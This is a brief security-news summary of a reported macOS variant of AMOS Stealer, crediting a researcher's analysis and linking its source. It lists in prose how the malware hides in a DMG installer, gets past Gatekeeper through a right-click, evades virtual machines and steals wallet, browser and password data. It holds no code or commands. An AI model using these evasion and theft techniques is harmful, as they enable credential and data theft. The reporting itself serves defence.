Summary: A new version of AMOS Stealer specifically targeting macOS has emerged, effectively evading detection and exploiting system vulnerabilities to exfiltrate sensitive data. This malware circumvents macOS Gatekeeper through user interaction and is designed to steal credentials, cryptocurrency information, and personal files. Security researcher Tonmoy Jitu has detailed its evasion techniques and functionality in a comprehensive analysis.
Affected: macOS users
Keypoints :
- Disguised as a DMG file named Installer_v2.7.8.dmg, it bypasses Gatekeeper using a right-click method.
- Undetected by 61 antivirus engines as of March 11, 2025, indicating its sophisticated stealth capabilities.
- Employs anti-VM logic to evade detection in virtual environments and utilizes AppleScript for malicious tasks.
- Targets various personal files and browser data, including cryptocurrency wallet information and system passwords.
- Steals data by archiving files and uploading them to a remote server.
Source: https://securityonline.info/amos-stealer-reloaded-inside-a-fully-undetected-macos-data-heist/